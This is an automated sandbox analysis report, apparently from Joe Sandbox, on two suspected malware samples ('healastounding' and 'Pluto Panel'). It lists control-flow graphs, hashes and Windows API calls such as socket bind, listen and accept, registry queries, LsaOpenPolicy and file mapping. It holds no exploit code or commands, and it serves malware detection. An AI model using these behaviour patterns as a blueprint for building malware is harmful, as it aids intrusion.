                                                                                                          • API String ID: 3934441357-0
                                                                                                          • Opcode ID: 11b54c776acbcf3ec685f06b36b01eb9fcd393526050087e261500ff127fd3f4
                                                                                                          • Instruction ID: af60c7d21705c3982440f85dee3a46a6fcb366ae6322dd9b83f2cff0eda10cbf
                                                                                                          • Opcode Fuzzy Hash: 11b54c776acbcf3ec685f06b36b01eb9fcd393526050087e261500ff127fd3f4
                                                                                                          • Instruction Fuzzy Hash: 55219071409380AFE7228F61DC45F56BFB8EF46310F19859BED859F163C268A509CB72
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 43 148a5e3-148a661 47 148a663-148a676 GetFileType 43->47 48 148a696-148a69b 43->48 49 148a678-148a695 47->49 50 148a69d-148a6a2 47->50 48->47 50->49
                                                                                                          APIs
                                                                                                          • GetFileType.KERNELBASE(?,00000E2C,1961FADE,00000000,00000000,00000000,00000000), ref: 0148A669
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileType
                                                                                                          • String ID:
                                                                                                          • API String ID: 3081899298-0
                                                                                                          • Opcode ID: e348510d4b6d07f8aba4300273c56384fb57ffbe5f9f2723368a8b706f36a04e
                                                                                                          • Instruction ID: 9064a61f39b3f0bf326b8bd2d41558224f7a7313a6b32fb49acd9773c1c64ab5
                                                                                                          • Opcode Fuzzy Hash: e348510d4b6d07f8aba4300273c56384fb57ffbe5f9f2723368a8b706f36a04e
                                                                                                          • Instruction Fuzzy Hash: 9521D8754083806FE7138B61DC40BA6BFA8DF46310F1884DBED849F253D268A909DB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 54 148a528-148a534 55 148a54e-148a594 54->55 56 148a536-148a54d 54->56 58 148a5d5-148a5da 55->58 59 148a596-148a59e FindCloseChangeNotification 55->59 56->55 58->59 60 148a5a4-148a5b6 59->60 62 148a5b8-148a5d4 60->62 63 148a5dc-148a5e1 60->63 63->62
                                                                                                          APIs
                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0148A59C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                          • String ID:
                                                                                                          • API String ID: 2591292051-0
                                                                                                          • Opcode ID: e49aa476da7ee2889f765a3c9841eb7cfb4b60b70946f4375be0746b7faeb166
                                                                                                          • Instruction ID: c616c75f09f468c065b7060b4e64965d6fc0662c150bb04f2beae5b2124ed314
                                                                                                          • Opcode Fuzzy Hash: e49aa476da7ee2889f765a3c9841eb7cfb4b60b70946f4375be0746b7faeb166
                                                                                                          • Instruction Fuzzy Hash: ED21AF7540E7C49FD7138B259C95696BFB4EF03220F1980EBDC858F2A3D2689948CB72
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 65 148a6d6-148a72d 68 148a72f-148a737 WriteFile 65->68 69 148a771-148a776 65->69 71 148a73d-148a74f 68->71 69->68 72 148a778-148a77d 71->72 73 148a751-148a76e 71->73 72->73
                                                                                                          APIs
                                                                                                          • WriteFile.KERNELBASE(?,00000E2C,1961FADE,00000000,00000000,00000000,00000000), ref: 0148A735
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3934441357-0
                                                                                                          • Opcode ID: 623ce954304004a44b0e5ef8dca986a144255ff48b6e84e77bef61bbb94cf300
                                                                                                          • Instruction ID: e6c2d1099b71a5342a4a93244c2c869986b0a7da1693006c64b040af86893bd6
                                                                                                          • Opcode Fuzzy Hash: 623ce954304004a44b0e5ef8dca986a144255ff48b6e84e77bef61bbb94cf300
                                                                                                          • Instruction Fuzzy Hash: 2811B272400204AFEB21EF55DC84B6AFBA8EF04310F14846BED459B261C278E5099FB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 76 148a616-148a661 79 148a663-148a676 GetFileType 76->79 80 148a696-148a69b 76->80 81 148a678-148a695 79->81 82 148a69d-148a6a2 79->82 80->79 82->81
                                                                                                          APIs
                                                                                                          • GetFileType.KERNELBASE(?,00000E2C,1961FADE,00000000,00000000,00000000,00000000), ref: 0148A669
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileType
                                                                                                          • String ID:
                                                                                                          • API String ID: 3081899298-0
                                                                                                          • Opcode ID: 24c0374b468ec457327f86572d437c2f2da9a4901b9b8b835fcf463ec30c0ddf
                                                                                                          • Instruction ID: 24f9ef2b5ca404bebbee4ff2407e394dc94c26d3957ca9b69c7a04b44b7fdfb4
                                                                                                          • Opcode Fuzzy Hash: 24c0374b468ec457327f86572d437c2f2da9a4901b9b8b835fcf463ec30c0ddf
                                                                                                          • Instruction Fuzzy Hash: 92012631500200AFE711DB15DC84F6BFB98DF44220F18C467ED48AF265C2B8A5088EB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 86 148a2dc-148a328 88 148a32a-148a33d SetErrorMode 86->88 89 148a353-148a358 86->89 90 148a35a-148a35f 88->90 91 148a33f-148a352 88->91 89->88 90->91
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNELBASE(?), ref: 0148A330
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode
                                                                                                          • String ID:
                                                                                                          • API String ID: 2340568224-0
                                                                                                          • Opcode ID: 6ff685ae3f0eed9ef74c501f46c6cd65d0ab397d76da50c7775a3d7e1ccdacf6
                                                                                                          • Instruction ID: 0cdc2b4e7abf6ca16cd655a3b81c066c397f5b19224fcd14bee677335df3c9b5
                                                                                                          • Opcode Fuzzy Hash: 6ff685ae3f0eed9ef74c501f46c6cd65d0ab397d76da50c7775a3d7e1ccdacf6
                                                                                                          • Instruction Fuzzy Hash: 87115E71409384AFD7128B15DC44B62FFB4EF46624F0880DBED858F263D2B5A808DB72
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 94 148a56a-148a594 95 148a5d5-148a5da 94->95 96 148a596-148a59e FindCloseChangeNotification 94->96 95->96 97 148a5a4-148a5b6 96->97 99 148a5b8-148a5d4 97->99 100 148a5dc-148a5e1 97->100 100->99
                                                                                                          APIs
                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0148A59C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                          • String ID:
                                                                                                          • API String ID: 2591292051-0
                                                                                                          • Opcode ID: 00fa5a817646d9e1bce18c75e9e852c186960ac0db60ac319d2d48c008460725
                                                                                                          • Instruction ID: 09682a6466f9ee1263611b8455a7f64cad2f2720106e3cca56f7477feb4d3fdd
                                                                                                          • Opcode Fuzzy Hash: 00fa5a817646d9e1bce18c75e9e852c186960ac0db60ac319d2d48c008460725
                                                                                                          • Instruction Fuzzy Hash: 6001BC715002448FDB11DF29E88476AFBA4DF04220F18C0ABDD098F626D6B8E448CFB2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 102 148a2fe-148a328 103 148a32a-148a33d SetErrorMode 102->103 104 148a353-148a358 102->104 105 148a35a-148a35f 103->105 106 148a33f-148a352 103->106 104->103 105->106
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNELBASE(?), ref: 0148A330
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode
                                                                                                          • String ID:
                                                                                                          • API String ID: 2340568224-0
                                                                                                          • Opcode ID: bab6619a16fbd278e0e3f36dd423849fc3be19649ef5a78383e0fb6b203bf7ae
                                                                                                          • Instruction ID: 71b6a82f5f6d2c5efec85294e90120c64f85bf8288527b5a2d89b0fb97e66360
                                                                                                          • Opcode Fuzzy Hash: bab6619a16fbd278e0e3f36dd423849fc3be19649ef5a78383e0fb6b203bf7ae
                                                                                                          • Instruction Fuzzy Hash: 4BF08C35904244CFDB10DF19E88876AFBA0EF04221F18C0ABDD494F726D2F9A408DEA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 109 17a0580-17a0612 119 17a063d-17a0656 109->119 120 17a0614-17a0631 109->120 123 17a0658 119->123 124 17a0661 119->124 126 17a0638-17a063b 120->126 123->124 126->119 126->120
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $gEq
                                                                                                          • API String ID: 0-3917529146
                                                                                                          • Opcode ID: 0b30a81042f54890bda3b4a1664e0e7729935c82c35e64477013b13c11b3ab3d
                                                                                                          • Instruction ID: 2567eff7f1c8f6e1b5a515ddc0276dbb2ee658d71d0a972c04e633978154bdc3
                                                                                                          • Opcode Fuzzy Hash: 0b30a81042f54890bda3b4a1664e0e7729935c82c35e64477013b13c11b3ab3d
                                                                                                          • Instruction Fuzzy Hash: E8218D70B002168FDB149F79C494BADBAF6AB89304F54456DE502EB291CEB58C058B91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 127 17a0070-17a007f 173 17a0085 call 31205f6 127->173 174 17a0085 call 17a0070 127->174 175 17a0085 call 17a0140 127->175 176 17a0085 call 31205cf 127->176 177 17a0085 call 17a0014 127->177 128 17a008b-17a00b1 131 17a00de-17a00f0 128->131 132 17a00b3-17a00c9 128->132 134 17a0135-17a0192 131->134 139 17a00f2-17a0123 131->139 133 17a00cb-17a00dc 132->133 132->134 133->131 133->132 144 17a0199-17a01af 134->144 147 17a012d-17a0134 139->147 149 17a0222-17a0235 144->149 150 17a01b1-17a01bd 144->150 151 17a0248-17a024c 149->151 155 17a01cb-17a01cd 150->155 156 17a01bf-17a01c5 150->156 152 17a024e 151->152 153 17a0257 151->153 152->153 159 17a0258 153->159 157 17a01cf-17a01db 155->157 158 17a0237-17a0241 155->158 160 17a01c9 156->160 161 17a01c7 156->161 165 17a01dd-17a01e3 157->165 166 17a01f5-17a0200 157->166 158->149 164 17a0243 158->164 159->159 160->155 161->155 164->150 167 17a01e7-17a01f3 165->167 168 17a01e5 165->168 166->158 171 17a0202-17a0220 166->171 167->166 168->166 171->151 173->128 174->128 175->128 176->128 177->128
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 65ef10ea0995c15fa9afbd508a055888fbbff5c5ac40b3e98ad69f53a36996df
                                                                                                          • Instruction ID: 07bb6f523e2a663224f6d1b6b33a3aaa1db93e1b2988eb8187483e62d9a989c6
                                                                                                          • Opcode Fuzzy Hash: 65ef10ea0995c15fa9afbd508a055888fbbff5c5ac40b3e98ad69f53a36996df
                                                                                                          • Instruction Fuzzy Hash: 5D510470B042068FDB259B79C454BBEBBF3ABC8210F55856AE505EB395CF749C02CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 178 17a02f0-17a03d4 192 17a040f-17a0418 178->192 193 17a041a-17a0420 192->193 194 17a043e-17a0447 192->194 193->194 195 17a0422-17a042b 193->195 196 17a0449 194->196 197 17a0453-17a0462 194->197 198 17a042d-17a043c 195->198 199 17a0481 195->199 196->197 200 17a0464-17a0466 197->200 198->200 203 17a0486 199->203 201 17a046c-17a047f 200->201 202 17a03d6-17a03dc call 17a0580 200->202 201->203 204 17a03e2-17a03ed 202->204 207 17a0487 203->207 205 17a03fa-17a040c 204->205 206 17a03ef-17a03f3 204->206 205->192 206->205 207->207
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.537809241.0000000003120000.00000040.00000020.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_3120000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.537809241.0000000003120000.00000040.00000020.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_3120000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511029727.0000000001482000.00000040.00000800.00020000.00000000.sdmp, Offset: 01482000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1482000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000004.00000002.463634270.0000000000900000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.488034995.0000000000C92000.00000002.00000001.01000000.00000005.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_900000_healastounding.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000004.00000002.463634270.0000000000900000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.488034995.0000000000C92000.00000002.00000001.01000000.00000005.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_900000_healastounding.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Execution Graph

Execution Coverage: 1.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 7%
Total number of Nodes: 86
Total number of Limit Nodes: 5
                                                                                                          execution_graph 44473 3231066 44475 323109b ioctlsocket 44473->44475 44476 32310c7 44475->44476 44477 167a8ae 44478 167a910 44477->44478 44479 167a8da closesocket 44477->44479 44478->44479 44480 167a8e8 44479->44480 44485 167bc2a 44487 167bc62 CreateFileW 44485->44487 44488 167bcb1 44487->44488 44489 3230032 44491 3230067 ReadFile 44489->44491 44492 3230099 44491->44492 44493 167a172 44494 167a1c2 WSAStartup 44493->44494 44495 167a1ca 44494->44495 44499 167a2fa 44500 167a326 FindCloseChangeNotification 44499->44500 44502 167a365 44499->44502 44501 167a334 44500->44501 44502->44500 44503 3230f82 44504 3230fb7 getsockname 44503->44504 44506 3230feb 44504->44506 44507 3231142 44509 323117a accept 44507->44509 44510 32311b5 44509->44510 44511 3230986 44513 32309be CreateMutexW 44511->44513 44514 3230a01 44513->44514 44515 167bd42 44518 167bd77 GetFileType 44515->44518 44517 167bda4 44518->44517 44519 167b002 44521 167b037 GetTokenInformation 44519->44521 44522 167b074 44521->44522 44523 32314c6 44524 3231536 44523->44524 44525 32314fe MapViewOfFile 44523->44525 44524->44525 44526 323150c 44525->44526 44527 3231246 44528 323127b WSAEventSelect 44527->44528 44530 32312b2 44528->44530 44531 323050a 44533 3230542 OpenFileMappingW 44531->44533 44534 323057d 44533->44534 44535 323060a 44536 3230642 MapViewOfFile 44535->44536 44538 3230691 44536->44538 44539 167b84e 44542 167b886 WSASocketW 44539->44542 44541 167b8c2 44542->44541 44543 3230a8e 44544 3230aa2 listen 44543->44544 44546 3230aec 44544->44546 44547 167a5d6 44548 167a614 DuplicateHandle 44547->44548 44549 167a64c 44547->44549 44550 167a622 44548->44550 44549->44548 44551 167ab56 44552 167ab8e RegOpenKeyExW 44551->44552 44554 167abe4 44552->44554 44555 32301d6 44556 3230226 CreateActCtxA 44555->44556 44557 3230234 44556->44557 44558 3230c56 44560 3230c8b GetProcessTimes 44558->44560 44561 3230cbd 44560->44561 
44562 167ac5e 44563 167ac93 RegQueryValueExW 44562->44563 44565 167ace7 44563->44565 44566 167b31e 44567 167b356 LsaOpenPolicy 44566->44567 44569 167b397 44567->44569 44570 3230e9e 44571 3230ed3 bind 44570->44571 44573 3230f07 44571->44573 44574 323141e 44575 323146e CreateFileMappingW 44574->44575 44576 3231476 44575->44576 44577 3231a9e 44578 3231aca LoadLibraryShim 44577->44578 44580 3231af8 44578->44580 44581 167a69a 44582 167a6c6 SetErrorMode 44581->44582 44583 167a6ef 44581->44583 44584 167a6db 44582->44584 44583->44582
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704089529.0000000001672000.00000040.00000800.00020000.00000000.sdmp, Offset: 01672000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_1672000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $qh,$%q82${%q
                                                                                                          • API String ID: 0-1436706911
                                                                                                          • Opcode ID: 39374c691851c4eb0de62d7c9dc22d319df4eea754b4ab7de623dfbde6a4b36b
                                                                                                          • Instruction ID: ee78b49934b6ae03a8e00dd9591d51286abe7f5bbfff35f7cbbd2b197afd80b8
                                                                                                          • Opcode Fuzzy Hash: 39374c691851c4eb0de62d7c9dc22d319df4eea754b4ab7de623dfbde6a4b36b
                                                                                                          • Instruction Fuzzy Hash: DC62DDBB85D7C05FD7138B348C66290BF70AB23224B9D45DFC4D48A4D3E25D994ACBA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 398 3230a50-3230a5a 399 3230aa2-3230adc 398->399 400 3230a5c 398->400 406 3230b1e-3230b23 399->406 407 3230ade-3230ae6 listen 399->407 401 3230a76-3230aa0 400->401 402 3230a5e-3230a75 400->402 401->399 402->401 406->407 408 3230aec-3230afe 407->408 410 3230b00-3230b1d 408->410 411 3230b25-3230b2a 408->411 411->410
                                                                                                          APIs
                                                                                                          • listen.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230AE4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: listen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3257165821-0
                                                                                                          • Opcode ID: 5277160ae89310da5945408f0b047a85bb863c4ea1a9ab5a7d623def6924073c
                                                                                                          • Instruction ID: 70dfabf8dddb7809599705b586501f36979d7802ec44356873007de765b87c16
                                                                                                          • Opcode Fuzzy Hash: 5277160ae89310da5945408f0b047a85bb863c4ea1a9ab5a7d623def6924073c
                                                                                                          • Instruction Fuzzy Hash: E921F6B14097846FE712CB54DC41B56BFACEF02324F0980DAED449F193D2785909CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • bind.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230EFF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: bind
                                                                                                          • String ID:
                                                                                                          • API String ID: 1187836755-0
                                                                                                          • Opcode ID: edcbeb84eff240d080d82be5f349c41d1a5e1b20bc0bd63b16a1854520f3b1d6
                                                                                                          • Instruction ID: 35559431c19d67ab0ad7a445d04b31fd12ed3b64e0b10d24beedfe22e883bad2
                                                                                                          • Opcode Fuzzy Hash: edcbeb84eff240d080d82be5f349c41d1a5e1b20bc0bd63b16a1854520f3b1d6
                                                                                                          • Instruction Fuzzy Hash: C12171B55093846FE712CF61DC84B96BFB8EF06220F0884EBED85DF152D268A549CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • bind.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230EFF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: bind
                                                                                                          • String ID:
                                                                                                          • API String ID: 1187836755-0
                                                                                                          • Opcode ID: 9530d8af3a82211d4b64243f9fdfeab6f7d87cf3d07c859eabebd67b41299385
                                                                                                          • Instruction ID: 78c88240c8f487564947ccbe81ac9dffaff6de367044e38da5838124cb37e2ff
                                                                                                          • Opcode Fuzzy Hash: 9530d8af3a82211d4b64243f9fdfeab6f7d87cf3d07c859eabebd67b41299385
                                                                                                          • Instruction Fuzzy Hash: 0C1190B1504205AFE710CF55DC84B9AFBACEF05620F08C4AAED459B251D678E548CAB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • listen.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230AE4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: listen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3257165821-0
                                                                                                          • Opcode ID: e06aea5f747b1a337e806e37a18ba287783ef2c2e882b00dff0f226d52c4c61a
